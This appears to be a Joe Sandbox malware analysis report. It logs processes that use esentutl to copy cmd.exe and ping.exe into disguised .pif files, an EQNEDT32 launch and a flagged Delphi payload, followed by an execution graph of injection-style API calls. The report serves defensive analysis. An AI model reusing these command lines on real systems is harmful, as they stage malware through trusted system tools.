                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                        Imagebase:0x970000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:03:43:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                        Imagebase:0x740000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:03:43:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                                        Imagebase:0xd80000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:03:43:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\SndVol.exe
                                        Imagebase:0x860000
                                        File size:314'368 bytes
                                        MD5 hash:2305BFF2966D73694972FD7531BC5BAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:03:43:49
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:17
                                        Start time:03:43:55
                                        Start date:25/09/2024
                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                        Imagebase:0x400000
                                        File size:1'088'512 bytes
                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:03:43:57
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\SndVol.exe
                                        Imagebase:0x850000
                                        File size:314'368 bytes
                                        MD5 hash:2305BFF2966D73694972FD7531BC5BAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Non-executed Functions

                                          Function 008E9DF7 Relevance: .9, Instructions: 865COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Offset: 008DF000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8df000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bc3465f06097e2d85310d8cccd422bbcf6bf31ba1a447da5ddd2855208061ec
                                          • Instruction ID: 1575fda312c13c985c8979291fee6b6945da2478829d54d51fffd4002a407eea
                                          • Opcode Fuzzy Hash: 4bc3465f06097e2d85310d8cccd422bbcf6bf31ba1a447da5ddd2855208061ec
                                          • Instruction Fuzzy Hash: FA42246244E7C19FC7078B3488B9490BFB0BE2321070E86DFC4D58F5A3E759A94AD766

                                          Execution Graph

                                          Execution Coverage:7.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:92.3%
                                          Total number of Nodes:1182
                                          Total number of Limit Nodes:9
                                          execution_graph 27727 2d6c350 27730 2d5f7c8 27727->27730 27729 2d6c358 27731 2d5f7d0 27730->27731 27731->27731 28816 2d588b8 27731->28816 27733 2d5f7f1 27734 2d5f7f6 27733->27734 27735 2d5f850 27734->27735 27736 2d5f87b 27735->27736 28822 2d589d0 27736->28822 27738 2d5f88e 27739 2d5f8b4 27738->27739 27740 2d5f8df 27739->27740 27741 2d589d0 4 API calls 27740->27741 27742 2d5f8f2 27741->27742 27743 2d5f918 27742->27743 27744 2d5f922 27743->27744 27745 2d589d0 4 API calls 27744->27745 27746 2d5f956 27745->27746 27747 2d5f986 27746->27747 27748 2d589d0 4 API calls 27747->27748 27749 2d5f9ba 27748->27749 27750 2d5f9ea 27749->27750 27751 2d589d0 4 API calls 27750->27751 27752 2d5fa1e 27751->27752 27753 2d5fa3c 27752->27753 27754 2d5fa4e 27753->27754 27755 2d589d0 4 API calls 27754->27755 27756 2d5fa82 27755->27756 27757 2d5faa0 27756->27757 27758 2d5fad3 27757->27758 27759 2d589d0 4 API calls 27758->27759 27760 2d5fae6 27759->27760 27761 2d5faf3 27760->27761 28815 2d6b2f8 27760->28815 27762 2d5fb1e 27761->27762 27761->28815 27763 2d589d0 4 API calls 27762->27763 27764 2d5fb27 27763->27764 27765 2d589d0 4 API calls 27764->27765 27766 2d5fb4e 27765->27766 27767 2d589d0 4 API calls 27766->27767 27768 2d5fb81 27767->27768 27769 2d5fbd9 27768->27769 27770 2d5fbf1 27769->27770 27771 2d589d0 4 API calls 27770->27771 27772 2d5fbfd 27771->27772 27773 2d589d0 4 API calls 27772->27773 27774 2d5fc30 27773->27774 27775 2d5fc40 27774->27775 27776 2d589d0 4 API calls 27775->27776 27777 2d5fc63 27776->27777 27778 2d589d0 4 API calls 27777->27778 27779 2d5fc96 27778->27779 27780 2d5fcf9 27779->27780 27781 2d5fd06 27780->27781 27782 2d589d0 4 API calls 27781->27782 27783 2d5fd12 27782->27783 27784 2d5fd75 27783->27784 27785 2d589d0 4 API calls 27784->27785 27786 2d5fd8e 27785->27786 27787 2d589d0 4 API calls 27786->27787 27788 2d5fdc1 27787->27788 27789 2d589d0 4 API calls 27788->27789 27790 2d5fdf4 27789->27790 27791 2d589d0 4 API calls 27790->27791 27792 2d5fe27 27791->27792 27793 2d5fe48 27792->27793 27794 2d5fe7f 27793->27794 27795 2d589d0 4 API calls 27794->27795 27796 2d5fea3 27795->27796 27797 2d5feb3 27796->27797 27798 2d589d0 4 API calls 27797->27798 27799 2d5fed6 27798->27799 27800 2d589d0 4 API calls 27799->27800 27801 2d5ff09 27800->27801 27802 2d5ff30 27801->27802 27803 2d589d0 4 API calls 27802->27803 27804 2d5ff3c 27803->27804 27805 2d5ff94 27804->27805 27806 2d589d0 4 API calls 27805->27806 27807 2d5ffb8 27806->27807 27808 2d5ffe4 27807->27808 27809 2d589d0 4 API calls 27808->27809 27810 2d60034 27809->27810 27811 2d6005b 27810->27811 27812 2d589d0 4 API calls 27811->27812 27813 2d60067 27812->27813 27814 2d589d0 4 API calls 27813->27814 27815 2d6009a 27814->27815 27816 2d589d0 4 API calls 27815->27816 27817 2d600cd 27816->27817 27818 2d589d0 4 API calls 27817->27818 27819 2d60149 27818->27819 27820 2d589d0 4 API calls 27819->27820 27821 2d601c5 27820->27821 27822 2d589d0 4 API calls 27821->27822 27823 2d60241 27822->27823 27824 2d589d0 4 API calls 27823->27824 27825 2d602bd 27824->27825 27826 2d602cc 27825->27826 27827 2d60327 27826->27827 27828 2d6033f 27827->27828 27829 2d589d0 4 API calls 27828->27829 27830 2d60382 27829->27830 27831 2d603a3 27830->27831 27832 2d603bb 27831->27832 27833 2d589d0 4 API calls 27832->27833 27834 2d603fe 27833->27834 27835 2d60414 27834->27835 27836 2d60427 27835->27836 27837 2d60534 27835->27837 27838 2d60448 27836->27838 27839 2d60555 27837->27839 27841 2d589d0 4 API calls 27838->27841 27840 2d589d0 4 API calls 27839->27840 27842 2d605b0 27840->27842 27843 2d604a3 27841->27843 27845 2d605d1 27842->27845 27844 2d604c4 27843->27844 27847 2d589d0 4 API calls 27844->27847 27846 2d589d0 4 API calls 27845->27846 27848 2d6051f 27846->27848 27847->27848 27849 2d6052f 27848->27849 27850 2d6066d 27849->27850 27851 2d589d0 4 API calls 27850->27851 27852 2d606c8 27851->27852 27853 2d606e9 27852->27853 27854 2d589d0 4 API calls 27853->27854 27855 2d60744 27854->27855 27856 2d60751 27855->27856 27857 2d60794 27856->27857 27858 2d607ec 27857->27858 27859 2d60804 27858->27859 27860 2d589d0 4 API calls 27859->27860 27861 2d60810 27860->27861 27862 2d60880 27861->27862 27863 2d589d0 4 API calls 27862->27863 27864 2d6088c 27863->27864 27865 2d608fc 27864->27865 27866 2d589d0 4 API calls 27865->27866 27867 2d60908 27866->27867 27868 2d60978 27867->27868 27869 2d589d0 4 API calls 27868->27869 27870 2d60984 27869->27870 27871 2d609c5 27870->27871 27872 2d609fc 27871->27872 27873 2d60a07 27872->27873 27874 2d589d0 4 API calls 27873->27874 27875 2d60a20 27874->27875 27876 2d60a41 27875->27876 27877 2d60a4c 27876->27877 27878 2d60a78 27877->27878 27879 2d60a83 27878->27879 27880 2d589d0 4 API calls 27879->27880 27881 2d60a9c 27880->27881 27882 2d60abd 27881->27882 27883 2d60ac8 27882->27883 27884 2d60aff 27883->27884 27885 2d589d0 4 API calls 27884->27885 27886 2d60b18 27885->27886 27887 2d60b22 27886->27887 27888 2d60b2f 27887->27888 27889 2d60b42 27888->27889 27890 2d612fe 27888->27890 27892 2d60b63 27889->27892 27891 2d6132a 27890->27891 27893 2d61337 27891->27893 27895 2d60b9a 27892->27895 27894 2d61356 27893->27894 27896 2d6136e 27894->27896 27897 2d60bb2 27895->27897 27898 2d589d0 4 API calls 27896->27898 27899 2d589d0 4 API calls 27897->27899 27900 2d6137a 27898->27900 27901 2d60bbe 27899->27901 27902 2d613a6 27900->27902 27904 2d60bdf 27901->27904 27903 2d613b3 27902->27903 27905 2d613d2 27903->27905 27906 2d60c16 27904->27906 27907 2d613ea 27905->27907 27908 2d60c2e 27906->27908 27909 2d589d0 4 API calls 27907->27909 27910 2d589d0 4 API calls 27908->27910 27913 2d613f6 27909->27913 27911 2d60c3a 27910->27911 27912 2d60c5b 27911->27912 27914 2d60c66 27912->27914 27915 2d6142f 27913->27915 27917 2d60c92 27914->27917 27916 2d6144e 27915->27916 27918 2d61466 27916->27918 27920 2d589d0 4 API calls 27917->27920 27919 2d589d0 4 API calls 27918->27919 27921 2d61472 27919->27921 27922 2d60cb6 27920->27922 27924 2d61494 27921->27924 27923 2d60cd8 27922->27923 27925 2d60d09 27923->27925 27927 2d614d0 27924->27927 27926 2d60d14 27925->27926 27930 2d60d40 27926->27930 27928 2d614fc 27927->27928 27929 2d61507 27928->27929 27932 2d61514 27929->27932 27931 2d60d58 27930->27931 27934 2d589d0 4 API calls 27931->27934 27933 2d589d0 4 API calls 27932->27933 27935 2d61520 27933->27935 27936 2d60d64 27934->27936 27938 2d6154c 27935->27938 27937 2d60d85 27936->27937 27941 2d60d90 27937->27941 27939 2d61578 27938->27939 27940 2d61583 27939->27940 27943 2d61590 27940->27943 27942 2d60dd4 27941->27942 27945 2d589d0 4 API calls 27942->27945 27944 2d589d0 4 API calls 27943->27944 27946 2d6159c 27944->27946 27947 2d60de0 27945->27947 27949 2d615c8 27946->27949 28832 2d44860 27947->28832 27953 2d615ff 27949->27953 27950 2d60e01 27951 2d60e43 27950->27951 27952 2d60e50 27951->27952 27955 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 27952->27955 27954 2d589d0 4 API calls 27953->27954 27958 2d61618 27954->27958 27956 2d60e5c 27955->27956 27957 2d60e71 27956->27957 27961 2d60e84 27957->27961 27959 2d61640 27958->27959 27960 2d61661 27959->27960 27962 2d61679 27960->27962 27963 2d60ebd 27961->27963 27966 2d616a3 27962->27966 27964 2d60ee7 27963->27964 27965 2d60ef4 27964->27965 27968 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 27965->27968 27967 2d589d0 4 API calls 27966->27967 27969 2d616bc 27967->27969 27970 2d60f00 27968->27970 27971 2d616dd 27969->27971 27972 2d60f39 27970->27972 27975 2d6171f 27971->27975 27973 2d60f63 27972->27973 27974 2d60f70 27973->27974 27977 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 27974->27977 27976 2d589d0 4 API calls 27975->27976 27980 2d61738 27976->27980 27978 2d60f7c 27977->27978 27979 2d60f9d 27978->27979 27982 2d612f9 27978->27982 27984 2d60fbe 27979->27984 27981 2d61790 27980->27981 27983 2d6179b 27981->27983 27986 2d62b11 27982->27986 27985 2d617a8 27983->27985 27989 2d60ff5 27984->27989 27987 2d589d0 4 API calls 27985->27987 27991 2d62b3b 27986->27991 27988 2d617b4 27987->27988 27994 2d617c3 27988->27994 27990 2d6100d 27989->27990 27993 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 27990->27993 27992 2d589d0 4 API calls 27991->27992 27997 2d62b54 27992->27997 27995 2d61019 27993->27995 27999 2d617fe 27994->27999 27996 2d6103a 27995->27996 27998 2d61045 27996->27998 28002 2d62b8d 27997->28002 28003 2d61071 27998->28003 28000 2d6182a 27999->28000 28001 2d61835 28000->28001 28004 2d61842 28001->28004 28005 2d62bc4 28002->28005 28006 2d61089 28003->28006 28007 2d589d0 4 API calls 28004->28007 28009 2d589d0 4 API calls 28005->28009 28010 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28006->28010 28008 2d6184e 28007->28008 28014 2d6187a 28008->28014 28013 2d62bd0 28009->28013 28011 2d61095 28010->28011 28012 2d610b6 28011->28012 28018 2d610c1 28012->28018 28017 2d62c09 28013->28017 28015 2d618a6 28014->28015 28016 2d618b1 28015->28016 28019 2d618be 28016->28019 28022 2d62c40 28017->28022 28020 2d61105 28018->28020 28021 2d589d0 4 API calls 28019->28021 28025 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28020->28025 28023 2d618ca 28021->28023 28024 2d589d0 4 API calls 28022->28024 28023->27982 28027 2d618dc 28023->28027 28028 2d62c4c 28024->28028 28026 2d61111 28025->28026 28031 2d61132 28026->28031 28029 2d618fd 28027->28029 28030 2d62c78 28028->28030 28036 2d61915 28029->28036 28032 2d62ca4 28030->28032 28033 2d61174 28031->28033 28034 2d62caf 28032->28034 28035 2d61181 28033->28035 28037 2d589d0 4 API calls 28034->28037 28038 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28035->28038 28041 2d589d0 4 API calls 28036->28041 28039 2d62cc8 28037->28039 28040 2d6118d 28038->28040 28045 2d62ced 28039->28045 28039->28815 28042 2d611ae 28040->28042 28043 2d61958 28041->28043 28046 2d611b9 28042->28046 28044 2d61979 28043->28044 28048 2d61991 28044->28048 28050 2d62d26 28045->28050 28047 2d611f0 28046->28047 28049 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28047->28049 28052 2d589d0 4 API calls 28048->28052 28051 2d61209 28049->28051 28053 2d589d0 4 API calls 28050->28053 28054 2d61213 28051->28054 28055 2d619d4 28052->28055 28056 2d62d69 28053->28056 28057 2d61220 28054->28057 28058 2d619de 28055->28058 28061 2d62da2 28056->28061 28059 2d6129e 28057->28059 28064 2d61a39 28058->28064 28060 2d612b6 28059->28060 28063 2d612d5 28060->28063 28062 2d589d0 4 API calls 28061->28062 28067 2d62de5 28062->28067 28065 2d612e0 28063->28065 28066 2d61a70 28064->28066 28069 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28065->28069 28068 2d589d0 4 API calls 28066->28068 28072 2d62e1e 28067->28072 28070 2d61a7c 28068->28070 28069->27982 28071 2d61a9d 28070->28071 28073 2d61ab5 28071->28073 28074 2d62e55 28072->28074 28076 2d61ad4 28073->28076 28075 2d589d0 4 API calls 28074->28075 28078 2d62e61 28075->28078 28077 2d61aec 28076->28077 28080 2d589d0 4 API calls 28077->28080 28079 2d62e8d 28078->28079 28083 2d62e9a 28079->28083 28081 2d61af8 28080->28081 28082 2d61b19 28081->28082 28085 2d61b31 28082->28085 28084 2d62ec4 28083->28084 28086 2d589d0 4 API calls 28084->28086 28088 2d61b50 28085->28088 28087 2d62edd 28086->28087 28090 2d62ee7 28087->28090 28089 2d589d0 4 API calls 28088->28089 28091 2d61b74 28089->28091 28094 2d62f09 28090->28094 28092 2d61b95 28091->28092 28093 2d61bad 28092->28093 28096 2d61bcc 28093->28096 28095 2d62f6c 28094->28095 28099 2d589d0 4 API calls 28095->28099 28097 2d61be4 28096->28097 28098 2d589d0 4 API calls 28097->28098 28100 2d61bf0 28098->28100 28101 2d62f85 28099->28101 28103 2d61c1c 28100->28103 28102 2d62fb1 28101->28102 28104 2d62fbe 28102->28104 28105 2d61c48 28103->28105 28106 2d62fdd 28104->28106 28107 2d61c53 28105->28107 28108 2d62fe8 28106->28108 28110 2d61c60 28107->28110 28109 2d62ff5 28108->28109 28111 2d589d0 4 API calls 28109->28111 28112 2d589d0 4 API calls 28110->28112 28117 2d63001 28111->28117 28113 2d61c6c 28112->28113 28114 2d61c97 28113->28114 28115 2d61cc3 28114->28115 28116 2d61cd0 28115->28116 28118 2d61cef 28116->28118 28119 2d6305a 28117->28119 28120 2d61cfa 28118->28120 28121 2d63091 28119->28121 28122 2d589d0 4 API calls 28120->28122 28123 2d589d0 4 API calls 28121->28123 28124 2d61d13 28122->28124 28125 2d6309d 28123->28125 28126 2d61d4c 28124->28126 28127 2d630d6 28125->28127 28129 2d61d76 28126->28129 28128 2d6310d 28127->28128 28130 2d589d0 4 API calls 28128->28130 28131 2d589d0 4 API calls 28129->28131 28134 2d63119 28130->28134 28132 2d61d8f 28131->28132 28133 2d61db0 28132->28133 28136 2d61dc8 28133->28136 28135 2d63152 28134->28135 28137 2d63171 28135->28137 28140 2d61df2 28136->28140 28138 2d6317c 28137->28138 28139 2d63189 28138->28139 28141 2d589d0 4 API calls 28139->28141 28142 2d589d0 4 API calls 28140->28142 28143 2d63195 28141->28143 28144 2d61e0b 28142->28144 28145 2d631a6 28143->28145 28148 2d61e36 28144->28148 28146 2d631bc 28145->28146 28147 2d631cf 28146->28147 28149 2d631f0 28147->28149 28151 2d61e6d 28148->28151 28150 2d631fb 28149->28150 28152 2d63208 28150->28152 28153 2d61e85 28151->28153 28154 2d63227 28152->28154 28155 2d589d0 4 API calls 28153->28155 28156 2d63232 28154->28156 28157 2d61e91 28155->28157 28158 2d6323f 28156->28158 28161 2d61eca 28157->28161 28159 2d589d0 4 API calls 28158->28159 28160 2d6324b 28159->28160 28166 2d6326c 28160->28166 28162 2d61ee9 28161->28162 28163 2d61ef4 28162->28163 28164 2d61f01 28163->28164 28165 2d589d0 4 API calls 28164->28165 28168 2d61f26 28164->28168 28165->28164 28167 2d589d0 4 API calls 28166->28167 28169 2d632c7 28167->28169 28170 2d61f52 28168->28170 28172 2d632e8 28169->28172 28171 2d61f7e 28170->28171 28173 2d61f89 28171->28173 28175 2d6331f 28172->28175 28174 2d589d0 4 API calls 28173->28174 28177 2d61fa2 28174->28177 28176 2d589d0 4 API calls 28175->28176 28178 2d63343 28176->28178 28179 2d61fce 28177->28179 28182 2d6337c 28178->28182 28180 2d61ffa 28179->28180 28181 2d62005 28180->28181 28183 2d589d0 4 API calls 28181->28183 28185 2d633b3 28182->28185 28377 2d6201e 28183->28377 28186 2d589d0 4 API calls 28185->28186 28187 2d633bf 28186->28187 28190 2d633dd 28187->28190 28188 2d62030 28189 2d6205c 28188->28189 28191 2d62088 28189->28191 28194 2d6340a 28190->28194 28192 2d62093 28191->28192 28193 2d589d0 4 API calls 28192->28193 28195 2d620ac 28193->28195 28200 2d63437 28194->28200 28196 2d620d8 28195->28196 28197 2d62104 28196->28197 28198 2d6210f 28197->28198 28199 2d589d0 4 API calls 28198->28199 28199->28377 28201 2d634b8 28200->28201 28202 2d589d0 4 API calls 28201->28202 28205 2d634d1 28202->28205 28203 2d6213f 28204 2d6216b 28203->28204 28209 2d62197 28204->28209 28207 2d63534 28205->28207 28206 2d589d0 4 API calls 28206->28209 28208 2d589d0 4 API calls 28207->28208 28211 2d6354d 28208->28211 28209->28206 28210 2d621e7 28209->28210 28216 2d62213 28210->28216 28212 2d63577 28211->28212 28248 2d636eb 28211->28248 28214 2d635a3 28212->28214 28213 2d589d0 4 API calls 28213->28216 28217 2d635da 28214->28217 28215 2d63739 28218 2d63770 28215->28218 28216->28213 28221 2d6225f 28216->28221 28219 2d589d0 4 API calls 28217->28219 28220 2d589d0 4 API calls 28218->28220 28226 2d635f3 28219->28226 28222 2d63789 28220->28222 28225 2d622ae 28221->28225 28223 2d637aa 28222->28223 28228 2d637e1 28223->28228 28224 2d589d0 4 API calls 28224->28225 28225->28224 28227 2d622e6 28225->28227 28230 2d63656 28226->28230 28229 2d622f3 28227->28229 28232 2d589d0 4 API calls 28228->28232 28233 2d62312 28229->28233 28231 2d589d0 4 API calls 28230->28231 28238 2d6366f 28231->28238 28235 2d63805 28232->28235 28234 2d6232a 28233->28234 28236 2d589d0 4 API calls 28234->28236 28239 2d63859 28235->28239 28237 2d62336 28236->28237 28240 2d62356 28237->28240 28242 2d636d2 28238->28242 28244 2d63890 28239->28244 28241 2d62377 28240->28241 28245 2d62382 28241->28245 28243 2d589d0 4 API calls 28242->28243 28243->28248 28246 2d589d0 4 API calls 28244->28246 28247 2d623ae 28245->28247 28249 2d638b4 28246->28249 28250 2d623b9 28247->28250 28248->28215 28253 2d638ed 28249->28253 28251 2d589d0 4 API calls 28250->28251 28252 2d623f3 28250->28252 28251->28250 28254 2d623fe 28252->28254 28255 2d63924 28253->28255 28257 2d6242a 28254->28257 28256 2d589d0 4 API calls 28255->28256 28258 2d63930 28256->28258 28259 2d62435 28257->28259 28261 2d6395c 28258->28261 28260 2d589d0 4 API calls 28259->28260 28262 2d6244e 28260->28262 28263 2d63993 28261->28263 28266 2d6249a 28262->28266 28264 2d589d0 4 API calls 28263->28264 28265 2d639ac 28264->28265 28269 2d639cd 28265->28269 28267 2d624c6 28266->28267 28268 2d624d1 28267->28268 28271 2d624de 28268->28271 28272 2d63a04 28269->28272 28270 2d589d0 4 API calls 28270->28271 28271->28270 28274 2d62516 28271->28274 28273 2d589d0 4 API calls 28272->28273 28281 2d63a28 28273->28281 28275 2d62542 28274->28275 28276 2d6254d 28275->28276 28278 2d6255a 28276->28278 28277 2d63a3d 28277->28281 28279 2d589d0 4 API calls 28278->28279 28280 2d62566 28279->28280 28284 2d6259b 28280->28284 28281->28277 28285 2d63aae 28281->28285 28350 2d63df3 28281->28350 28282 2d6555c 28283 2d65593 28282->28283 28286 2d589d0 4 API calls 28283->28286 28290 2d625d2 28284->28290 28288 2d63ae7 28285->28288 28287 2d655ac 28286->28287 28289 2d655cd 28287->28289 28292 2d63b1e 28288->28292 28296 2d65604 28289->28296 28293 2d625ea 28290->28293 28291 2d589d0 4 API calls 28291->28293 28294 2d589d0 4 API calls 28292->28294 28293->28291 28295 2d62617 28293->28295 28298 2d63b2a 28294->28298 28297 2d62622 28295->28297 28299 2d589d0 4 API calls 28296->28299 28302 2d6264e 28297->28302 28301 2d63b56 28298->28301 28300 2d65628 28299->28300 28309 2d65654 28300->28309 28303 2d63b8d 28301->28303 28305 2d62666 28302->28305 28306 2d589d0 4 API calls 28303->28306 28304 2d589d0 4 API calls 28304->28305 28305->28304 28308 2d62688 28305->28308 28307 2d63ba6 28306->28307 28311 2d63bc7 28307->28311 28313 2d6269b 28308->28313 28310 2d589d0 4 API calls 28309->28310 28312 2d656a4 28310->28312 28314 2d63bfe 28311->28314 28319 2d656d0 28312->28319 28316 2d626f3 28313->28316 28315 2d589d0 4 API calls 28314->28315 28318 2d63c22 28315->28318 28322 2d6270b 28316->28322 28317 2d589d0 4 API calls 28317->28322 28324 2d63c5b 28318->28324 28320 2d589d0 4 API calls 28319->28320 28321 2d65720 28320->28321 28333 2d65746 28321->28333 28322->28317 28323 2d62750 28322->28323 28325 2d6276f 28323->28325 28326 2d63c92 28324->28326 28327 2d6277a 28325->28327 28328 2d589d0 4 API calls 28326->28328 28329 2d62787 28327->28329 28331 2d63c9e 28328->28331 28330 2d589d0 4 API calls 28329->28330 28332 2d62793 28330->28332 28334 2d63cc7 28331->28334 28336 2d627c4 28332->28336 28335 2d589d0 4 API calls 28333->28335 28338 2d63d35 28334->28338 28344 2d657c2 28335->28344 28337 2d627f0 28336->28337 28339 2d627fb 28337->28339 28342 2d63d6c 28338->28342 28341 2d62808 28339->28341 28340 2d589d0 4 API calls 28340->28341 28341->28340 28347 2d62840 28341->28347 28343 2d589d0 4 API calls 28342->28343 28345 2d63d85 28343->28345 28346 2d589d0 4 API calls 28344->28346 28348 2d63dcb 28345->28348 28353 2d6583e 28346->28353 28376 2d6286c 28347->28376 28348->28350 28349 2d62877 28349->28377 28350->27729 28350->28282 28351 2d589d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28351->28377 28352 2d628b5 28355 2d6290d 28352->28355 28354 2d589d0 4 API calls 28353->28354 28359 2d658e6 28354->28359 28357 2d62925 28355->28357 28356 2d589d0 4 API calls 28356->28357 28357->28356 28358 2d6296a 28357->28358 28360 2d62989 28358->28360 28361 2d589d0 4 API calls 28359->28361 28362 2d62994 28360->28362 28366 2d65962 28361->28366 28363 2d629a1 28362->28363 28364 2d589d0 4 API calls 28363->28364 28365 2d629ad 28364->28365 28368 2d629ee 28365->28368 28367 2d589d0 4 API calls 28366->28367 28373 2d659de 28367->28373 28369 2d62a06 28368->28369 28370 2d62a25 28369->28370 28372 2d62a30 28370->28372 28371 2d589d0 4 API calls 28371->28372 28372->28371 28375 2d62a6a 28372->28375 28374 2d589d0 4 API calls 28373->28374 28378 2d65a5a 28374->28378 28375->28376 28376->28349 28377->27982 28377->28144 28377->28188 28377->28203 28377->28351 28377->28352 28887 2d5e4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28377->28887 28379 2d589d0 4 API calls 28378->28379 28380 2d65b07 28379->28380 28381 2d589d0 4 API calls 28380->28381 28382 2d65b83 28381->28382 28383 2d589d0 4 API calls 28382->28383 28384 2d65bff 28383->28384 28385 2d589d0 4 API calls 28384->28385 28386 2d65c7b 28385->28386 28387 2d589d0 4 API calls 28386->28387 28388 2d65cf7 28387->28388 28389 2d589d0 4 API calls 28388->28389 28390 2d65d73 28389->28390 28391 2d67568 28390->28391 28393 2d65dd3 28390->28393 28392 2d589d0 4 API calls 28391->28392 28395 2d675e4 28392->28395 28394 2d589d0 4 API calls 28393->28394 28397 2d65e4f 28394->28397 28396 2d589d0 4 API calls 28395->28396 28399 2d67660 28396->28399 28398 2d589d0 4 API calls 28397->28398 28401 2d65ecb 28398->28401 28400 2d589d0 4 API calls 28399->28400 28403 2d676dc 28400->28403 28402 2d589d0 4 API calls 28401->28402 28406 2d65f47 28402->28406 28404 2d589d0 4 API calls 28403->28404 28405 2d67758 28404->28405 28407 2d589d0 4 API calls 28405->28407 28408 2d589d0 4 API calls 28406->28408 28409 2d677d4 28407->28409 28410 2d65ffb 28408->28410 28412 2d68318 28409->28412 28413 2d677e9 28409->28413 28411 2d589d0 4 API calls 28410->28411 28416 2d66077 28411->28416 28414 2d589d0 4 API calls 28412->28414 28415 2d589d0 4 API calls 28413->28415 28419 2d68394 28414->28419 28418 2d67865 28415->28418 28417 2d589d0 4 API calls 28416->28417 28422 2d660f3 28417->28422 28420 2d589d0 4 API calls 28418->28420 28421 2d589d0 4 API calls 28419->28421 28424 2d678e1 28420->28424 28425 2d68410 28421->28425 28423 2d589d0 4 API calls 28422->28423 28433 2d6616f 28423->28433 28426 2d589d0 4 API calls 28424->28426 28427 2d589d0 4 API calls 28425->28427 28428 2d6795d 28426->28428 28430 2d6848c 28427->28430 28889 2d585bc GetModuleHandleA GetProcAddress 28428->28889 28431 2d589d0 4 API calls 28430->28431 28432 2d68508 28431->28432 28435 2d6851d 28432->28435 28440 2d693a1 28432->28440 28434 2d589d0 4 API calls 28433->28434 28442 2d6623c 28434->28442 28438 2d6853e 28435->28438 28436 2d67986 28437 2d589d0 4 API calls 28436->28437 28445 2d67a02 28437->28445 28439 2d68575 28438->28439 28443 2d589d0 4 API calls 28439->28443 28441 2d589d0 4 API calls 28440->28441 28450 2d6941d 28441->28450 28444 2d589d0 4 API calls 28442->28444 28447 2d68599 28443->28447 28451 2d662b8 28444->28451 28446 2d589d0 4 API calls 28445->28446 28456 2d67a7e 28446->28456 28448 2d685d2 28447->28448 28449 2d68609 28448->28449 28452 2d589d0 4 API calls 28449->28452 28453 2d589d0 4 API calls 28450->28453 28454 2d589d0 4 API calls 28451->28454 28455 